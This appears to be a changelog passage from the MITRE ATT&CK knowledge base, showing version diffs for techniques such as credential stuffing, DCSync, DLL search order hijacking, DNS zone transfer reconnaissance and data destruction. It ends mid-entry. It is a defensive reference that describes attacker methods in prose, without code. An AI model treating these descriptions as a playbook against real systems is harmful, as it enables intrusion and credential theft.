[T1578.001] Modify Cloud Compute Infrastructure: Create Snapshot
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-03-08 10:33:02.060000+00:00 | 2024-10-15 15:53:44.870000+00:00 |
external_references[1]['url'] | https://content.fireeye.com/m-trends/rpt-m-trends-2020 | https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf |
x_mitre_version | 1.1 | 1.2 |
[T1056.004] Input Capture: Credential API Hooking
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-11-10 18:29:31.138000+00:00 | 2024-08-27 21:03:56.385000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1110.004] Brute Force: Credential Stuffing
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-03-07 14:28:02.910000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[7] | Google Workspace | Office Suite |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1589.001] Gather Victim Identity Information: Credentials
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
t | Adversaries may gather credentials that can be used during t | t | Adversaries may gather credentials that can be used during t |
| argeting. Account credentials gathered by adversaries may be | | argeting. Account credentials gathered by adversaries may be |
| those directly associated with the target victim organizati | | those directly associated with the target victim organizati |
| on or attempt to take advantage of the tendency for users to | | on or attempt to take advantage of the tendency for users to |
| use the same passwords across personal and business account | | use the same passwords across personal and business account |
| s. Adversaries may gather credentials from potential victim | | s. Adversaries may gather credentials from potential victim |
| s in various ways, such as direct elicitation via [Phishing | | s in various ways, such as direct elicitation via [Phishing |
| for Information](https://attack.mitre.org/techniques/T1598). | | for Information](https://attack.mitre.org/techniques/T1598). |
| Adversaries may also compromise sites then add malicious co | | Adversaries may also compromise sites then add malicious co |
| ntent designed to collect website authentication cookies fro | | ntent designed to collect website authentication cookies fro |
| m visitors.(Citation: ATT ScanBox) Credential information ma | | m visitors.(Citation: ATT ScanBox) (Citation: Register Deloi |
| y also be exposed to adversaries via leaks to online or othe | | tte)(Citation: Register Uber)(Citation: Detectify Slack Toke |
| r accessible data sets (ex: [Search Engines](https://attack. | | ns)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleH |
| mitre.org/techniques/T1593/002), breach dumps, code reposito | | og)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Where mul |
| ries, etc.).(Citation: Register Deloitte)(Citation: Register | | ti-factor authentication (MFA) based on out-of-band communic |
| Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes Gi | | ations is in use, adversaries may compromise a service provi |
| tHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gi | | der to gain access to MFA codes and one-time passwords (OTP) |
| trob)(Citation: CNET Leaks) Adversaries may also purchase cr | | .(Citation: Okta Scatter Swine 2022) Credential information |
| edentials from dark web or other black-markets. Finally, whe | | may also be exposed to adversaries via leaks to online or o |
| re multi-factor authentication (MFA) based on out-of-band co | | ther accessible data sets (ex: [Search Engines](https://atta |
| mmunications is in use, adversaries may compromise a service | | ck.mitre.org/techniques/T1593/002), breach dumps, code repos |
| provider to gain access to MFA codes and one-time passwords | | itories, etc.). Adversaries may purchase credentials from da |
| (OTP).(Citation: Okta Scatter Swine 2022) Gathering this i | | rk web markets, such as Russian Market and 2easy, or through |
| nformation may reveal opportunities for other forms of recon | | access to Telegram channels that distribute logs from infos |
| naissance (ex: [Search Open Websites/Domains](https://attack | | tealer malware.(Citation: Bleeping Computer 2easy 2021)(Cita |
| .mitre.org/techniques/T1593) or [Phishing for Information](h | | tion: SecureWorks Infostealers 2023)(Citation: Bleeping Comp |
| ttps://attack.mitre.org/techniques/T1598)), establishing ope | | uter Stealer Logs 2023) Gathering this information may reve |
| rational resources (ex: [Compromise Accounts](https://attack | | al opportunities for other forms of reconnaissance (ex: [Sea |
| .mitre.org/techniques/T1586)), and/or initial access (ex: [E | | rch Open Websites/Domains](https://attack.mitre.org/techniqu |
| xternal Remote Services](https://attack.mitre.org/techniques | | es/T1593) or [Phishing for Information](https://attack.mitre |
| /T1133) or [Valid Accounts](https://attack.mitre.org/techniq | | .org/techniques/T1598)), establishing operational resources |
| ues/T1078)). | | (ex: [Compromise Accounts](https://attack.mitre.org/techniqu |
| | | es/T1586)), and/or initial access (ex: [External Remote Serv |
| | | ices](https://attack.mitre.org/techniques/T1133) or [Valid A |
| | | ccounts](https://attack.mitre.org/techniques/T1078)). |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-14 23:29:10.396000+00:00 | 2024-10-10 13:45:01.069000+00:00 |
description | Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). | Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)
Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.). Adversaries may purchase credentials from dark web markets, such as Russian Market and 2easy, or through access to Telegram channels that distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer Stealer Logs 2023)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Bleeping Computer 2easy 2021', 'description': 'Bill Toulas. (2021, December 21). 2easy now a significant dark web marketplace for stolen data. Retrieved October 7, 2024.', 'url': 'https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/'} |
external_references | | {'source_name': 'Bleeping Computer Stealer Logs 2023', 'description': 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain: Stealer Logs in Context. Retrieved October 10, 2024.', 'url': 'https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/'} |
external_references | | {'source_name': 'SecureWorks Infostealers 2023', 'description': 'SecureWorks Counter Threat Unit Research Team. (2023, May 16). The Growing Threat from Infostealers. Retrieved October 10, 2024.', 'url': 'https://www.secureworks.com/research/the-growing-threat-from-infostealers'} |
x_mitre_contributors | | Massimo Giaimo, Würth Group Cyber Defence Center |
[T1555.003] Credentials from Password Stores: Credentials from Web Browsers
Current version: 1.2
Version changed from: 1.1 → 1.2
New Mitigations:
- M1017: User Training
- M1018: User Account Management
- M1021: Restrict Web-Based Content
- M1051: Update Software
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-02-15 19:29:57.405000+00:00 | 2024-08-15 14:13:45.294000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1053.003] Scheduled Task/Job: Cron
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
x_mitre_remote_support | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-03-24 17:33:03.443000+00:00 | 2024-10-15 18:45:51.945000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1003.006] OS Credential Dumping: DCSync
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['Administrator'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-22 20:20:14.595000+00:00 | 2024-10-15 15:54:08.312000+00:00 |
external_references[6]['description'] | Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved August 7, 2017. | Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved September 23, 2024. |
external_references[6]['url'] | http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/ | https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/ |
x_mitre_version | 1.0 | 1.1 |
[T1574.001] Hijack Execution Flow: DLL Search Order Hijacking
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
t | Adversaries may execute their own malicious payloads by hija | t | Adversaries may execute their own malicious payloads by hija |
| cking the search order used to load DLLs. Windows systems us | | cking the search order used to load DLLs. Windows systems us |
| e a common method to look for required DLLs to load into a p | | e a common method to look for required DLLs to load into a p |
| rogram. (Citation: Microsoft Dynamic Link Library Search Ord | | rogram. (Citation: Microsoft Dynamic Link Library Search Ord |
| er)(Citation: FireEye Hijacking July 2010) Hijacking DLL loa | | er)(Citation: FireEye Hijacking July 2010) Hijacking DLL loa |
| ds may be for the purpose of establishing persistence as wel | | ds may be for the purpose of establishing persistence as wel |
| l as elevating privileges and/or evading restrictions on fil | | l as elevating privileges and/or evading restrictions on fil |
| e execution. There are many ways an adversary can hijack DL | | e execution. There are many ways an adversary can hijack DL |
| L loads. Adversaries may plant trojan dynamic-link library f | | L loads. Adversaries may plant trojan dynamic-link library f |
| iles (DLLs) in a directory that will be searched before the | | iles (DLLs) in a directory that will be searched before the |
| location of a legitimate library that will be requested by a | | location of a legitimate library that will be requested by a |
| program, causing Windows to load their malicious library wh | | program, causing Windows to load their malicious library wh |
| en it is called for by the victim program. Adversaries may a | | en it is called for by the victim program. Adversaries may a |
| lso perform DLL preloading, also called binary planting atta | | lso perform DLL preloading, also called binary planting atta |
| cks, (Citation: OWASP Binary Planting) by placing a maliciou | | cks, (Citation: OWASP Binary Planting) by placing a maliciou |
| s DLL with the same name as an ambiguously specified DLL in | | s DLL with the same name as an ambiguously specified DLL in |
| a location that Windows searches before the legitimate DLL. | | a location that Windows searches before the legitimate DLL. |
| Often this location is the current working directory of the | | Often this location is the current working directory of the |
| program.(Citation: FireEye fxsst June 2011) Remote DLL prelo | | program.(Citation: FireEye fxsst June 2011) Remote DLL prelo |
| ading attacks occur when a program sets its current director | | ading attacks occur when a program sets its current director |
| y to a remote location such as a Web share before loading a | | y to a remote location such as a Web share before loading a |
| DLL. (Citation: Microsoft Security Advisory 2269637) Phanto | | DLL. (Citation: Microsoft Security Advisory 2269637) Phanto |
| m DLL hijacking is a specific type of DLL search order hijac | | m DLL hijacking is a specific type of DLL search order hijac |
| king where adversaries target references to non-existent DLL | | king where adversaries target references to non-existent DLL |
| files.(Citation: Adversaries Hijack DLLs) They may be able | | files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversar |
| to load their own malicious DLL by planting it with the corr | | ies Hijack DLLs) They may be able to load their own maliciou |
| ect name in the location of the missing module. Adversaries | | s DLL by planting it with the correct name in the location o |
| may also directly modify the search order via DLL redirecti | | f the missing module. Adversaries may also directly modify |
| on, which after being enabled (in the Registry and creation | | the search order via DLL redirection, which after being enab |
| of a redirection file) may cause a program to load a differe | | led (in the Registry and creation of a redirection file) may |
| nt DLL.(Citation: Microsoft Dynamic-Link Library Redirection | | cause a program to load a different DLL.(Citation: Microsof |
| )(Citation: Microsoft Manifests)(Citation: FireEye DLL Searc | | t Dynamic-Link Library Redirection)(Citation: Microsoft Mani |
| h Order Hijacking) If a search order-vulnerable program is | | fests)(Citation: FireEye DLL Search Order Hijacking) If a s |
| configured to run at a higher privilege level, then the adve | | earch order-vulnerable program is configured to run at a hig |
| rsary-controlled DLL that is loaded will also be executed at | | her privilege level, then the adversary-controlled DLL that |
| the higher level. In this case, the technique could be used | | is loaded will also be executed at the higher level. In this |
| for privilege escalation from user to administrator or SYST | | case, the technique could be used for privilege escalation |
| EM or from administrator to SYSTEM, depending on the program | | from user to administrator or SYSTEM or from administrator t |
| . Programs that fall victim to path hijacking may appear to | | o SYSTEM, depending on the program. Programs that fall victi |
| behave normally because malicious DLLs may be configured to | | m to path hijacking may appear to behave normally because ma |
| also load the legitimate DLLs they were meant to replace. | | licious DLLs may be configured to also load the legitimate D |
| | | LLs they were meant to replace. |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-28 15:51:58.945000+00:00 | 2024-09-30 17:32:59.948000+00:00 |
description | Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. | Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. |
x_mitre_version | 1.2 | 1.3 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Hexacorn DLL Hijacking', 'description': 'Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5. Retrieved August 14, 2024.', 'url': 'https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/'} |
[T1590.002] Gather Victim Network Information: DNS
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
t | Adversaries may gather information about the victim's DNS th | t | Adversaries may gather information about the victim's DNS th |
| at can be used during targeting. DNS information may include | | at can be used during targeting. DNS information may include |
| a variety of details, including registered name servers as | | a variety of details, including registered name servers as |
| well as records that outline addressing for a target’s subdo | | well as records that outline addressing for a target’s subdo |
| mains, mail servers, and other hosts. DNS, MX, TXT, and SPF | | mains, mail servers, and other hosts. DNS MX, TXT, and SPF r |
| records may also reveal the use of third party cloud and Saa | | ecords may also reveal the use of third party cloud and SaaS |
| S providers, such as Office 365, G Suite, Salesforce, or Zen | | providers, such as Office 365, G Suite, Salesforce, or Zend |
| desk.(Citation: Sean Metcalf Twitter DNS Records) Adversari | | esk.(Citation: Sean Metcalf Twitter DNS Records) Adversarie |
| es may gather this information in various ways, such as quer | | s may gather this information in various ways, such as query |
| ying or otherwise collecting details via [DNS/Passive DNS](h | | ing or otherwise collecting details via [DNS/Passive DNS](ht |
| ttps://attack.mitre.org/techniques/T1596/001). DNS informati | | tps://attack.mitre.org/techniques/T1596/001). DNS informatio |
| on may also be exposed to adversaries via online or other ac | | n may also be exposed to adversaries via online or other acc |
| cessible data sets (ex: [Search Open Technical Databases](ht | | essible data sets (ex: [Search Open Technical Databases](htt |
| tps://attack.mitre.org/techniques/T1596)).(Citation: DNS Dum | | ps://attack.mitre.org/techniques/T1596)).(Citation: DNS Dump |
| pster)(Citation: Circl Passive DNS) Gathering this informati | | ster)(Citation: Circl Passive DNS) Gathering this informatio |
| on may reveal opportunities for other forms of reconnaissanc | | n may reveal opportunities for other forms of reconnaissance |
| e (ex: [Search Open Technical Databases](https://attack.mitr | | (ex: [Search Open Technical Databases](https://attack.mitre |
| e.org/techniques/T1596), [Search Open Websites/Domains](http | | .org/techniques/T1596), [Search Open Websites/Domains](https |
| s://attack.mitre.org/techniques/T1593), or [Active Scanning] | | ://attack.mitre.org/techniques/T1593), or [Active Scanning]( |
| (https://attack.mitre.org/techniques/T1595)), establishing o | | https://attack.mitre.org/techniques/T1595)), establishing op |
| perational resources (ex: [Acquire Infrastructure](https://a | | erational resources (ex: [Acquire Infrastructure](https://at |
| ttack.mitre.org/techniques/T1583) or [Compromise Infrastruct | | tack.mitre.org/techniques/T1583) or [Compromise Infrastructu |
| ure](https://attack.mitre.org/techniques/T1584)), and/or ini | | re](https://attack.mitre.org/techniques/T1584)), and/or init |
| tial access (ex: [External Remote Services](https://attack.m | | ial access (ex: [External Remote Services](https://attack.mi |
| itre.org/techniques/T1133)). | | tre.org/techniques/T1133)). Adversaries may also use DNS zo |
| | | ne transfer (DNS query type AXFR) to collect all records fro |
| | | m a misconfigured DNS server.(Citation: Trails-DNS)(Citation |
| | | : DNS-CISA)(Citation: Alexa-dns) |
New Mitigations:
- M1054: Software Configuration
Dropped Mitigations:
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-21 14:32:48.393000+00:00 | 2024-09-12 19:36:20.374000+00:00 |
description | Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). | Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns) |
external_references[3]['description'] | Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved May 27, 2022. | Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. September 12, 2024. |
external_references[3]['url'] | https://twitter.com/PyroTek3/status/1126487227712921600/photo/1 | https://x.com/PyroTek3/status/1126487227712921600 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'DNS-CISA', 'description': 'CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May Leak Domain Information. Retrieved June 5, 2024.', 'url': 'https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information'} |
external_references | | {'source_name': 'Alexa-dns', 'description': "Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved June 5, 2024.", 'url': 'https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/'} |
external_references | | {'source_name': 'Trails-DNS', 'description': "SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.", 'url': 'https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds'} |
[T1485] Data Destruction
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
t | Adversaries may destroy data and files on specific systems o | t | Adversaries may destroy data and files on specific systems o |
| r in large numbers on a network to interrupt availability to | | r in large numbers on a network to interrupt availability to |
| systems, services, and network resources. Data destruction | | systems, services, and network resources. Data destruction |
| is likely to render stored data irrecoverable by forensic te | | is likely to render stored data irrecoverable by forensic te |
| chniques through overwriting files or data on local and remo | | chniques through overwriting files or data on local and remo |
| te drives.(Citation: Symantec Shamoon 2012)(Citation: FireEy | | te drives.(Citation: Symantec Shamoon 2012)(Citation: FireEy |
| e Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Ci | | e Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Ci |
| tation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon | | tation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon |
| 3 2018)(Citation: Talos Olympic Destroyer 2018) Common opera | | 3 2018)(Citation: Talos Olympic Destroyer 2018) Common opera |
| ting system file deletion commands such as <code>del</code> | | ting system file deletion commands such as <code>del</code> |
| and <code>rm</code> often only remove pointers to files with | | and <code>rm</code> often only remove pointers to files with |
| out wiping the contents of the files themselves, making the | | out wiping the contents of the files themselves, making the |
| files recoverable by proper forensic methodology. This behav | | files recoverable by proper forensic methodology. This behav |
| ior is distinct from [Disk Content Wipe](https://attack.mitr | | ior is distinct from [Disk Content Wipe](https://attack.mitr |
| e.org/techniques/T1561/001) and [Disk Structure Wipe](https: | | e.org/techniques/T1561/001) and [Disk Structure Wipe](https: |
| //attack.mitre.org/techniques/T1561/002) because individual | | //attack.mitre.org/techniques/T1561/002) because individual |
| files are destroyed rather than sections of a storage disk o | | files are destroyed rather than sections of a storage disk o |
| r the disk's logical structure. Adversaries may attempt to | | r the disk's logical structure. Adversaries may attempt to |
| overwrite files and directories with randomly generated data | | overwrite files and directories with randomly generated data |
| to make it irrecoverable.(Citation: Kaspersky StoneDrill 20 | | to make it irrecoverable.(Citation: Kaspersky StoneDrill 20 |
| 17)(Citation: Unit 42 Shamoon3 2018) In some cases political | | 17)(Citation: Unit 42 Shamoon3 2018) In some cases political |
| ly oriented image files have been used to overwrite data.(Ci | | ly oriented image files have been used to overwrite data.(Ci |
| tation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoo | | tation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoo |
| n Nov 2016)(Citation: Kaspersky StoneDrill 2017) To maximiz | | n Nov 2016)(Citation: Kaspersky StoneDrill 2017) To maximiz |
| e impact on the target organization in operations where netw | | e impact on the target organization in operations where netw |
| ork-wide availability interruption is the goal, malware desi | | ork-wide availability interruption is the goal, malware desi |
| gned for destroying data may have worm-like features to prop | | gned for destroying data may have worm-like features to prop |
| agate across a network by leveraging additional techniques l | | agate across a network by leveraging additional techniques l |
| ike [Valid Accounts](https://attack.mitre.org/techniques/T10 | | ike [Valid Accounts](https://attack.mitre.org/techniques/T10 |
| 78), [OS Credential Dumping](https://attack.mitre.org/techni | | 78), [OS Credential Dumping](https://attack.mitre.org/techni |
| ques/T1003), and [SMB/Windows Admin Shares](https://attack.m | | ques/T1003), and [SMB/Windows Admin Shares](https://attack.m |
| itre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2 | | itre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2 |
| 012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto | | 012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto |
| Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Cita | | Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Cita |
| tion: Talos Olympic Destroyer 2018). In cloud environments, | | tion: Talos Olympic Destroyer 2018). In cloud environments, |
| adversaries may leverage access to delete cloud storage, cl | | adversaries may leverage access to delete cloud storage obj |
| oud storage accounts, machine images, and other infrastructu | | ects, machine images, database instances, and other infrastr |
| re crucial to operations to damage an organization or their | | ucture crucial to operations to damage an organization or th |
| customers.(Citation: Data Destruction - Threat Post)(Citatio | | eir customers.(Citation: Data Destruction - Threat Post)(Cit |
